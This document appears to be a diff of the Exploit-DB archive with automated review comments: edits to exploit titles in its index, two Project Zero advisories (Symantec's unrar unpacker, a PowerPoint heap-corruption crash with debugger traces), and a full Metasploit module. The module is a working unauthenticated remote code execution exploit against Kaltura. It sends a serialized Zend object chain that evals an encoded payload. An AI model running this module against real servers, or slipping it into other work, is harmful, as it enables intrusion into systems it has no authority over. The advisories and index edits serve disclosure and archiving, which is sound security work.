25137,platforms/php/remote/25137.rb,"WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)",2013-05-01,Metasploit,php,remote,0
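Review bot: the old 25134 title, "glibc FORTIFY_SOURemote Code Execution Bypass", is the footprint of an earlier bulk substitution of "RCE" with "Remote Code Execution" that matched inside the identifier FORTIFY_SOURCE; the corrected title is right, but the same substitution may have damaged other identifiers, so grep files.csv for "Remote Code Execution" appearing mid-word (no space before it) and fix any further hits in the same pass.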
@ -26431,7 +26434,7 @@ id,file,description,date,author,platform,type,port
29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0
29387,platforms/windows/dos/29387.pl,"Plogue Sforzando 1.665 - Buffer Overflow (SEH) (PoC)",2013-11-03,"Mike Czumak",windows,dos,0
29475,platforms/multiple/remote/29475.txt,"Oracle January 2007 Security Update - Multiple Vulnerabilities",2007-01-16,"Esteban Martinez Fayo",multiple,remote,0
29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0
29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0
29389,platforms/multiple/webapps/29389.txt,"Practico 13.9 - Multiple Vulnerabilities",2013-11-03,LiquidWorm,multiple,webapps,0
29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 - edittag.cgi file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0
29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 - edittag.pl file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0
@ -30553,7 +30556,7 @@ id,file,description,date,author,platform,type,port
33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST Parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0
33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0
33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0
33851,platforms/php/webapps/33851.txt,"WordPress Theme TimThumb 2.8.13 WebShot Plugin/ - Remote Code Execution",2014-06-24,@u0x,php,webapps,0
33851,platforms/php/webapps/33851.txt,"Multiple WordPress Plugins (Using TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,php,webapps,0
33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0
33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0
33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0
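Review bot: the new 33851 title introduces "WordThumb 1.07" and the "(Using TimThumb 2.8.13 / ...)" qualifier, details the old title did not carry, so they should be checked against the advisory in platforms/php/webapps/33851.txt rather than taken on trust; the stray "Plugin/ -" in the old title is correctly removed by the rewrite.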
platforms/multiple/dos/40405.txt (13 lines added, executable file)
@ -0,0 +1,13 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=867

In issue 810 we pointed out to Symantec that they hadn't updated their unrar based unpacker for years, and it was vulnerable to dozens of publicly documented flaws.

I had expected Symantec to rebase on 5.4.2 (the latest version as of this writing), but they appear to have just backported fixes for the few issues I sent them.

Here are two known bugs in unrar that are fixed upstream, but not in Symantec's ancient code. If they continue to refuse to rebase, this might take a few iterations to shake the bugs out. Sigh.

As in issue 810, these are remote code execution vulnerabilities at the highest possible privilege level.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40405.zip
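Review bot: the file is committed as "Executable file" although it is a plain-text advisory with no interpreter line; add it with a non-executable mode (644) so the repository does not carry an executable bit on a .txt entry. The content itself only links to the PoC archive by URL and references issues 810 and 867, which is appropriate for a text entry.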
platforms/php/remote/40404.rb (101 lines added, executable file)
@ -0,0 +1,101 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => 'Kaltura Remote PHP Code Execution',
'Description' => %q{
This module exploits an Object Injection vulnerability in Kaltura.
By exploiting this vulnerability, unauthenticated users can execute
arbitrary code under the context of the web server user.

Kaltura has a module named keditorservices that takes user input
and then uses it as an unserialized function parameter. The constructed
object is based on the SektionEins Zend code execution POP chain PoC,
with a minor modification to ensure Kaltura processes it and the
Zend_Log function's __destruct() method is called. Kaltura versions
prior to 11.1.0-2 are affected by this issue.

This module was tested against Kaltura 11.1.0 installed on CentOS 6.8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Security-Assessment.com', # discovery
'Mehmet Ince <mehmet@mehmetince.net>' # msf module
],
'References' =>
[
['EDB', '39563']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Mar 15 2016',
'DefaultTarget' => 0
))

register_options(
[
OptString.new('TARGETURI', [true, 'The target URI of the Kaltura installation', '/'])
]
)
end

def check
r = rand_text_alpha(15 + rand(4))
cmd = "print_r(#{r}).die()"

p = ""
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
'vars_get' => {
'kdata' => Rex::Text.encode_base64(p)
}
)

if res && res.body.include?(r)
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end

def exploit
cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"

p = ""
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
'vars_get' => {
'kdata' => Rex::Text.encode_base64(p)
}
)
end
end
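Review bot: the serialized Zend_Log object is assembled twice, once in `check` and once in `exploit`, with the seven `p << ...` lines identical apart from the value of `cmd`; move that construction into a single helper taking `cmd` so the two copies cannot drift apart when one is edited. In `check`, a nil `res` (no HTTP response at all) falls through to `Exploit::CheckCode::Safe`, where the framework's convention for "could not determine" is `Exploit::CheckCode::Unknown`; `exploit` stores `res` but never inspects it, so a failed request is silent. Minor: `#{cmd.length.to_s}` is redundant, since string interpolation already calls `to_s`.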
86
platforms/windows/dos/40406.txt
Executable file
@ -0,0 +1,86 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=866

The following crash was observed in Microsoft PowerPoint 2010 running under Windows 7 x86 with application verifier enabled.

File versions are:
mso.dll: 14.0.7166.5000
ppcore.dll: 14.0.7168.5000

Attached crashing file: 3525170180.ppt

Crashing context:

eax=1979aea0 ebx=1638bb50 ecx=1979aea0 edx=0024e340 esi=00000000 edi=00000000
eip=663088d8 esp=0024e330 ebp=0024e330 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
ppcore!DllGetLCID+0x18205e:
663088d8 ff7110 push dword ptr [ecx+10h] ds:0023:1979aeb0=????????

Call Stack:

ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0024e330 663088cc 1979aea0 0024e46c 00000000 ppcore!DllGetLCID+0x18205e
0024e350 663072cb 0024e46c e437cde4 00000000 ppcore!DllGetLCID+0x182052
0024e4c8 662fcbda 1cd76fe8 0024e4f0 0024e574 ppcore!DllGetLCID+0x180a51
0024e598 662fc9ee 00000000 0024e5e0 0024e63e ppcore!DllGetLCID+0x176360
0024e5ac 662e82fd 0024e5e0 0024e63e e4362e14 ppcore!DllGetLCID+0x176174
00250738 662e7c88 17802ef8 073def40 1638bb50 ppcore!DllGetLCID+0x161a83
00250774 6619d3e9 002508a4 00250890 1638bb50 ppcore!DllGetLCID+0x16140e

Disassembly:

663088d2 55 push ebp
663088d3 8bec mov ebp,esp
663088d5 8b4d08 mov ecx,dword ptr [ebp+8]
663088d8 ff7110 push dword ptr [ecx+10h] ds:0023:1979aeb0=????????

The ecx register is pointing to invalid memory in this crash. Looking at the call stack and disassembly above we can see that this value was passed in as the first argument to the crashing function. The calling function obtained this value from a pointer in stack memory at 0x0024e46c + 0x10:

0:000> dd poi(0024e46c)
1cb7cfa0 00000000 1cb7cfa0 00000002 19045ea0
1cb7cfb0 1979aea0 00000000 00000000 00000000

We can verify that this is allocated memory and find the function that allocated it:

(address changed between runs and is now 0x1cb7cfa0)

0:000> !heap -p -a 1cb7cfa0
address 1cb7cfa0 found in
_DPH_HEAP_ROOT @ 1261000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1d2b14e0: 1cb7cfa0 5c - 1cb7c000 2000
6f748e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
7719616e ntdll!RtlDebugAllocateHeap+0x00000030
7715a08b ntdll!RtlpAllocateHeap+0x000000c4
77125920 ntdll!RtlAllocateHeap+0x0000023a
72eaad1a vrfcore!VerifierSetAPIClassName+0x000000aa
701f16ac vfbasics+0x000116ac
641a6cca mso!Ordinal149+0x000078e0
66118132 ppcore!PPMain+0x00001244
662fcbda ppcore!DllGetLCID+0x00176360
662fc9ee ppcore!DllGetLCID+0x00176174
662e82fd ppcore!DllGetLCID+0x00161a83

Setting breakpoints on ppcore!DllGetLCID+0x00176360 and subsequent memory write access breakpoints at eax+0x10 (there are multiple hits) eventually resulted in the same file crashing with a different context:

eax=00000000 ebx=17c2cb50 ecx=00000000 edx=00000000 esi=1a36eea0 edi=1a36eea0
eip=6625a361 esp=0022e1d0 ebp=0022e1f8 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210293
ppcore!DllGetLCID+0xd3ae7:
6625a361 8b4870 mov ecx,dword ptr [eax+70h] ds:0023:00000070=????????

0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0022e1f8 662d7d30 661813c4 ec3f4e62 00000000 ppcore!DllGetLCID+0xd3ae7
0022e220 663088e2 00000000 661813c4 0022e250 ppcore!DllGetLCID+0x1514b6
0022e230 663088cc 1a36eea0 0022e36c 00000000 ppcore!DllGetLCID+0x182068
0022e250 663072cb 0022e36c ec3f4f8a 00000000 ppcore!DllGetLCID+0x182052
0022e3c8 662fcbda 1c7a4fe8 0022e3f0 0022e474 ppcore!DllGetLCID+0x180a

Given the different crashing contexts related to timing when breakpoints are set I suspect this to be a heap corruption bug that Application Verifier does not detect.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40406.zip
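Review bot: the last frame of the second `kb` listing, `0022e3c8 662fcbda ... ppcore!DllGetLCID+0x180a`, looks truncated: the same return address `662fcbda` is symbolized as `ppcore!DllGetLCID+0x180a51` in the first call stack, so the symbol offset here should be checked against the linked Project Zero issue before this text is committed. The report also names an attached file `3525170180.ppt` while the Proof of Concept line points at `40406.zip`; a sentence stating how the two relate would save readers a guess.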